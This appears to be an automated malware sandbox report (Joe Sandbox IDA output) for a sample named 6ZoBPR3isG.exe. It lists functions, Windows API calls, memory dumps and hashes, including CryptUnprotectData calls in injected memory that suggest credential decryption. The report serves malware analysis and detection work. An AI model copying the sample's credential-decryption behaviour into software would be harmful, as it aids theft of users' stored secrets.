Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3916508600
Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
Instruction ID: 595fb0ef6d3bfc82903baa2f142a0de03b6946227050b98ce465681b6cfad29b
Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
Instruction Fuzzy Hash: AED0A771101630AAC111AB448D04CDF63ACEE45304342003BF601B70A2CB7C1D6287FD

Function 00405DC5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5

Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,76133180,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76133180,00000000), ref: 00405D76
Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93

lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,76133180,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76133180,00000000), ref: 00405E1E
GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,76133180,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76133180), ref: 00405E2E

Strings

0_B, xrefs: 00405DCB

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: 0_B
API String ID: 3248276644-2128305573
Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE

Function 004059D1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
CloseHandle.KERNEL32(?), ref: 00405A07

Strings

Error launching installer, xrefs: 004059E4

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C

Function 00403A43 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76133180,00403A1A,761336C0,00403819,00000006,?,00000006,00000008,0000000A), ref: 00403A5D
GlobalFree.KERNEL32(?), ref: 00403A64

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403A55

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3916508600
Opcode ID: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
Instruction ID: 7abb624b42f0eb5bf3103b67fd66c27476adae564a61ccebc81435f3e7eba37d
Opcode Fuzzy Hash: e06207bb45b670d34af272b3fb1259f6a40c1f68299225e6b4906b67dd7614d2
Instruction Fuzzy Hash: 73E0EC326111205BC6229F59AD44B5E776D6F58B22F0A023AE8C07B26087745D938F98

Function 73F910E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 73F9116A
GlobalFree.KERNEL32(00000000), ref: 73F911C7
GlobalFree.KERNEL32(00000000), ref: 73F911D9
GlobalFree.KERNEL32(?), ref: 73F91203

Memory Dump Source

Source File: 00000000.00000002.1691129260.0000000073F91000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F90000, based on PE: true

Associated: 00000000.00000002.1691075383.0000000073F90000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1691156863.0000000073F94000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1691207488.0000000073F96000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73f90000_6ZoBPR3isG.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 405d9a0a59d3d50cf25b8b740af6b7f7fea6bb61c045c1b5628a5e8a4587ce7b
Instruction ID: becacad73157ef8428c13353141df505d75a110d6fa9dbb1d147a3024b3a4239
Opcode Fuzzy Hash: 405d9a0a59d3d50cf25b8b740af6b7f7fea6bb61c045c1b5628a5e8a4587ce7b
Instruction Fuzzy Hash: 9231A3B3900606EFF300AF65C955B2977FCEB452D0725013AE84BEB274E734D8418B68

Function 00405E43 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98

Analysis Process: 6ZoBPR3isG.exePID: 8068, Parent PID: 7760COMMON

Execution Graph

Execution Coverage:	10.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.1%
Total number of Nodes:	283
Total number of Limit Nodes:	23

Executed Functions

Function 3775AEA8 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 396
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Z/Kq, xrefs: 3775AED2

Memory Dump Source

Source File: 00000003.00000002.2648375166.0000000037750000.00000040.00000800.00020000.00000000.sdmp, Offset: 37750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37750000_6ZoBPR3isG.jbxd

Similarity

API ID: DispatchMessage
String ID: Z/Kq
API String ID: 2061451462-2188043875
Opcode ID: 55954127cbc5bbd63a39966ee1c4e1340689d80ae80a0b0014446118012d21f7
Instruction ID: 1420077051355b58890975203b4970e756777338192b71eb726f048c7e834bd9
Opcode Fuzzy Hash: 55954127cbc5bbd63a39966ee1c4e1340689d80ae80a0b0014446118012d21f7
Instruction Fuzzy Hash: EFF13A75A00309CFEB04CFA5C848BADBBB2FF48324F158569E405AF2A5DB74A945CF81

Function 36B9A700 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 36B9AEA5

Strings

Z/Kq, xrefs: 36B9AE5A

Memory Dump Source

Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd

Similarity

API ID: CryptDataUnprotect
String ID: Z/Kq
API String ID: 834300711-2188043875
Opcode ID: e7f5d1fefa25037a20cba3d7c345b42ccac3f6f210e79ebd5dc9bbd94f88e564
Instruction ID: 5a16bf57448d6262cfce1a3319f572139cb5bbf8ee2181eef8bfa832427c24b4
Opcode Fuzzy Hash: e7f5d1fefa25037a20cba3d7c345b42ccac3f6f210e79ebd5dc9bbd94f88e564
Instruction Fuzzy Hash: 15112976800749DFDB10CF9AC844BDEBBF4EF48310F24842AE958A7250C379A951DFA5

Function 36B9AE39 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 36B9AEA5

Strings

Z/Kq, xrefs: 36B9AE5A

Memory Dump Source

Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd

Similarity

API ID: CryptDataUnprotect
String ID: Z/Kq
API String ID: 834300711-2188043875
Opcode ID: cc521966cd7ff7eebdb5922881e3e863dcc226804562f978c394aee9f99c22db
Instruction ID: 9f22bfa0c40ffe16170ae01e3003f7b1f2fc942f0f31998d42b73887a335f2bb
Opcode Fuzzy Hash: cc521966cd7ff7eebdb5922881e3e863dcc226804562f978c394aee9f99c22db
Instruction Fuzzy Hash: D411797680024ADFDB10CFA6C844BDEBFF5EF48320F24846AE958A7650C379A550CFA5

Function 36AE0040 Relevance: .9, Instructions: 947COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646352175.0000000036AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36ae0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf35d7e4fa03a1187a4addca63dea622877da25cabe77a680ed1559ca2af41c5
Instruction ID: a6c7646466087b19a70c5db1381e2aba4668b3daff5d96394cb01dd7c634aef8
Opcode Fuzzy Hash: cf35d7e4fa03a1187a4addca63dea622877da25cabe77a680ed1559ca2af41c5
Instruction Fuzzy Hash: 00826F74A00219CFEB04DFA5C894A9EBBF2BF88344F658169E845EB361DB30DD51DB90

Function 36AE36C8 Relevance: .9, Instructions: 921COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646352175.0000000036AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36ae0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 703e4a1dc9ff7dafc53ce640c12de6f09c55508afc853a585171a7798592e2d5
Instruction ID: 3f9aead94fb1f37fa584aa2ad0964515b40c67fda90e99f43bab45371acd1272
Opcode Fuzzy Hash: 703e4a1dc9ff7dafc53ce640c12de6f09c55508afc853a585171a7798592e2d5
Instruction Fuzzy Hash: F682A174A04205DFDB05CFA9C994A9EBBF6FF88300F158569E805DB3A1DB31E951CBA0

Function 3775C068 Relevance: .8, Instructions: 764COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2648375166.0000000037750000.00000040.00000800.00020000.00000000.sdmp, Offset: 37750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37750000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 460babb3efc8f85913096ab9d85f2a5424666648aaab4526b9119ee88883cbce
Instruction ID: 58b0b59d94c9c52bb9fcb8f0c61283361699591fb0729e5a71d3dc91522b0f3d
Opcode Fuzzy Hash: 460babb3efc8f85913096ab9d85f2a5424666648aaab4526b9119ee88883cbce
Instruction Fuzzy Hash: 3B82B274A05229CFEB25DF64D994BADB7B2FB89300F1081E9D409673A0DB319E92CF54

Function 371F8770 Relevance: .8, Instructions: 758COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa49d3863993b81347d59eb4a2c06f27dd006bb42f77f6e1cd22f70db7f7151e
Instruction ID: 76372e42f46150ba7f2041008ebfd2dfed8dd27724a1f3f9720d94db4119a216
Opcode Fuzzy Hash: aa49d3863993b81347d59eb4a2c06f27dd006bb42f77f6e1cd22f70db7f7151e
Instruction Fuzzy Hash: EC72B274A05228CFEB25DF64D994BA9B7B2FB89300F1081E9D409773A0DB319E92DF54

Function 371F4FD0 Relevance: .7, Instructions: 709COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a82806c4c938b802ad9760efc689ddd225511dfc2f16fd445741009ca3217ab
Instruction ID: 9078034d95003e8a5772c48493eeb9d662b85be3f340d4621dd4288980cf7704
Opcode Fuzzy Hash: 7a82806c4c938b802ad9760efc689ddd225511dfc2f16fd445741009ca3217ab
Instruction Fuzzy Hash: 2F72CD75E05228CFEB65DF65C980BDDBBB2BB49300F5082E9D409A7255EB31AE81CF50

Function 36AE30B0 Relevance: .4, Instructions: 350COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646352175.0000000036AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36ae0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c26af80035ec18e7a27893d7af45315c3b87e71819db07601b52b08b528b09d
Instruction ID: 21715ade458473754b514160f24168b519923d2590c8531a18a3eae4a4d12665
Opcode Fuzzy Hash: 6c26af80035ec18e7a27893d7af45315c3b87e71819db07601b52b08b528b09d
Instruction Fuzzy Hash: 6DD1D234A007059FDB01CFAAC880A9ABBB6FF85350F5585AADC58DB351DB31EC05CBA1

Function 00166270 Relevance: .3, Instructions: 348COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2616338852.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_160000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 247d5105251397d532bf5ee35134b9a6861771128157debfbf420535e6fc8e09
Instruction ID: 29f5b1af41916cc5ed1d32ae265cb1c2c4d2a92f9c5550353dca3b67365620f3
Opcode Fuzzy Hash: 247d5105251397d532bf5ee35134b9a6861771128157debfbf420535e6fc8e09
Instruction Fuzzy Hash: 31E13935600B049FD725CB69C884BDBB7E6FF88314F198A28D59E8B255DB30F865CB90

Function 36B99AA8 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a7a7f7d4b13e3506071a6c32dd0323133e046c4430a2b79281c801a79791ada
Instruction ID: 1ca23208a7e9522d449de425a51fabc34200952eff4a4a5fb70d7cb991fdad36
Opcode Fuzzy Hash: 5a7a7f7d4b13e3506071a6c32dd0323133e046c4430a2b79281c801a79791ada
Instruction Fuzzy Hash: 80E1BD74E01218CFEB64DFA5C994BDDBBB2BF89304F2081A9D408B7290DB359A85CF15

Function 36B9E120 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646408989.0000000036B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36b90000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 531ab632ace4fbf6d4f10bcf866df47493b39cc8e099efcca8e50bf51dad877d
Instruction ID: 93e96af4b01ea4c794714692683f870c032783fd2658f55ed5760f61553e7592
Opcode Fuzzy Hash: 531ab632ace4fbf6d4f10bcf866df47493b39cc8e099efcca8e50bf51dad877d
Instruction Fuzzy Hash: A3C19F74E00218CFEB14DFA5D994B9DBBF2BF89304F2081A9D409AB395DB359A85CF50

Function 36AED8C8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646352175.0000000036AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36ae0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5e25d7e78e9e4a18a29a895e39c40de29f24344d548d61f4fbb8dadc6656ea6
Instruction ID: 1686efffe9dd52da960169306ab40b9cdd58231f7e0cee6510cebdc965f9496b
Opcode Fuzzy Hash: f5e25d7e78e9e4a18a29a895e39c40de29f24344d548d61f4fbb8dadc6656ea6
Instruction Fuzzy Hash: 35C19074E00218CFEB14DFA5D954B9DBBB2FF89304F2081A9D809AB395DB359A85CF10

Function 36AEDFF2 Relevance: .2, Instructions: 234COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646352175.0000000036AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36ae0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53d015e35303660639670e65d487d9bbc662461c9093f0ce1e6ba1ff17182db7
Instruction ID: f9f053b90cf7a5f2b76029fe1f763ed69899c3214b34cccdc409308d6437bd30
Opcode Fuzzy Hash: 53d015e35303660639670e65d487d9bbc662461c9093f0ce1e6ba1ff17182db7
Instruction Fuzzy Hash: EFA1F174D00218CFEB14DFA5C984BDDBBB2FF89314F208269E409AB291DB749989CF55

Function 36AEE347 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646352175.0000000036AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36ae0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c16be2a974359ce021cacecc10f8bd9d4dd751f376420f69aadf51e018e66b8a
Instruction ID: 414c48895fea5966be5645fef6e8caaf3d63702c96767e7e5380577ec4df3b53
Opcode Fuzzy Hash: c16be2a974359ce021cacecc10f8bd9d4dd751f376420f69aadf51e018e66b8a
Instruction Fuzzy Hash: 8D91EE74D00218CFEB10DFA9C988B9DFBB1FF49314F208269E409AB2A1DB749985CF55

Function 0016DEC0 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2616338852.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_160000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cba803625b74cda9f152ebeef80fb834a1c3661e5bb0bc62c24b36a74b1a1731
Instruction ID: d1e36b9675e2f4c766c0f07218cdbee915150a2774263d83d5a0d07e8d88ff66
Opcode Fuzzy Hash: cba803625b74cda9f152ebeef80fb834a1c3661e5bb0bc62c24b36a74b1a1731
Instruction Fuzzy Hash: 5061C574E002088FEB18DFAAD854A9DFBF2BF89300F14C169E819AB365DB745942DF50

Function 3775CBB6 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2648375166.0000000037750000.00000040.00000800.00020000.00000000.sdmp, Offset: 37750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37750000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb54571c08e047ae3d4bdef91383613f6a181eaf6b3b76a62c4a15b7c9f63fc9
Instruction ID: 4d7fe12bdde5517b4c15e6917b196b9e3ad14693b74028e036af8b7dc05ef805
Opcode Fuzzy Hash: bb54571c08e047ae3d4bdef91383613f6a181eaf6b3b76a62c4a15b7c9f63fc9
Instruction Fuzzy Hash: 2D611A74A4021ACFEB25DF60D954BADB7B2FB88300F1080A9D909777A1DE319E92DF50

Function 371F92AF Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6b8a09cb98c7d5fc0da896f64cf5fc1105082d524441feaf52c65c7603ce30e
Instruction ID: 032917ec3af9c5eb52d17a59d0d0cde53ceee37d58dd27306d5f0f495efae918
Opcode Fuzzy Hash: e6b8a09cb98c7d5fc0da896f64cf5fc1105082d524441feaf52c65c7603ce30e
Instruction Fuzzy Hash: 78611974A04258CFEB25DF60D954BADB7B2FB88300F1085AAD91A77394DB319E92DF10

Function 36AED8B7 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2646352175.0000000036AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_36ae0000_6ZoBPR3isG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8393577fddb7b4fd5e72a95822eedc73558348e9ac9d7ff27065c2d02d916590
Instruction ID: a4d65789ce125257b71a244b2b9c90c83882e9c4ed311ac0598cfb2700926ef2
Opcode Fuzzy Hash: 8393577fddb7b4fd5e72a95822eedc73558348e9ac9d7ff27065c2d02d916590
Instruction Fuzzy Hash: 7341E374E00208CBEB18EFA6D95469EFBF2EF89304F20D129C815BB254DB35594ACF44

Function 371FDDD0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 137
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 371FDE5E
GetCurrentThread.KERNEL32 ref: 371FDE9B
GetCurrentProcess.KERNEL32 ref: 371FDED8
GetCurrentThreadId.KERNEL32 ref: 371FDF31

Strings

Z/Kq, xrefs: 371FDDFC

Memory Dump Source

Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd

Similarity

API ID: Current$ProcessThread
String ID: Z/Kq
API String ID: 2063062207-2188043875
Opcode ID: 628709290cde5e4ccd6c7e4de44f09c8bd6f75533a7abf54759a26db3dfc0ef6
Instruction ID: 115dfd92b6519b6b684b2eedb07ea3bc9367c052eaa14dc03d40e3a86fef2300
Opcode Fuzzy Hash: 628709290cde5e4ccd6c7e4de44f09c8bd6f75533a7abf54759a26db3dfc0ef6
Instruction Fuzzy Hash: 985185B09007498FDB14CFA9C558BEEBBF1AF88300F208559D459B73A1CB75A941CF65

Function 371FDDE0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 371FDE5E
GetCurrentThread.KERNEL32 ref: 371FDE9B
GetCurrentProcess.KERNEL32 ref: 371FDED8
GetCurrentThreadId.KERNEL32 ref: 371FDF31

Strings

Z/Kq, xrefs: 371FDDFC

Memory Dump Source

Source File: 00000003.00000002.2646737279.00000000371F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 371F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_371f0000_6ZoBPR3isG.jbxd

Similarity

API ID: Current$ProcessThread
String ID: Z/Kq
API String ID: 2063062207-2188043875
Opcode ID: 268b0fa3b51c439e333988baa946e559f90cd8b729e516d329af8112e83cd52b
Instruction ID: 225078cb7dcc2d1c6fbd4e4edafd1a9ee3a43bb164497564e5dba846999483c4
